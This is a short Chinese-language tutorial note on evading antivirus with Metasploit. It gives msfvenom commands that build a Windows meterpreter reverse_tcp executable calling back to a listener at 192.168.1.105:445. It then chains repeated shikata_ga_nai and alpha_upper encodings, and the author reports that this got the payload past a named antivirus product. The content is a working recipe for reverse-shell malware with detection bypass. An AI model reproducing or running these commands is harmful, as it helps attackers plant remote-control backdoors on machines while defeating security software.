Metasploit笔记--免杀技巧

0x01 杀毒软件杀毒原理
目前的大多数杀病毒软件采用的方法主要是特征码（signatures）查毒方案与人工解毒并行，亦即在查病毒时采用特征码查毒，在杀病毒时采用人工编制解毒代码。特征码装载在杀毒引擎中，用来对磁盘和进程进行扫描，寻找匹配对象

0x02 MSF编码器（msfencode）
利用MSF编码器改变可执行文件的代码形状，生成新的二进制文件并将文件解码到内存中执行，让杀毒软件识别不出原来的样子，而程序功能不受编码影响

0x03 生成攻击载荷（msfpayload）

1. 命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=445 -f exe >payload.exe
2. 
   
3. 参数：
   -p, –payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload，请使用& #039;-& #039;或者stdin指定
   -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
   详见：

http://blog.csdn.net/lijia111111/article/details/64124693

0x04 程序检测

将生成的载荷文件payload.exe拷贝到Windows主机上，看电脑管家能不能检测出来

1. 意外。。。这种简单方式没有任何处理的载荷执行文件99%都会被检测出来的，应该是因为编码器每次生成的攻击载荷文件都不一样。杀毒软件识别攻击载荷的恶意代码确实是个谜：有时候能检测出来有时候幸运就全然不知
2. 那99%的情况是这个样子
   
   一拷贝没等我反应就帮我清除了。。。。

0x05 多重编码
Metasploit框架允许对攻击载荷进行多次编码，绕过杀毒软件的特征码检查，是比较有效的一种方法

1. 命令：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' -e x86/alpha_upper -i 5 LHOST=192.168.1.105 LPORT=445 -f exe >payload2.exe
   

2. 检测
   
   这次就算是成功躲避了电脑管家的检测，因为payload2.exe使用了12次的shikata_ga_nai编码、5次alpha_upper编码，理论上能躲过杀毒软件检测。
   实际情况比这个要复杂得多、不同操作系统编码命令不同、在不断对攻击载荷编码的同时杀毒软件也会持续更新病毒库
   利用MSF编码器只是一种比较便捷的方式，还有更多过杀毒软件的姿势待更……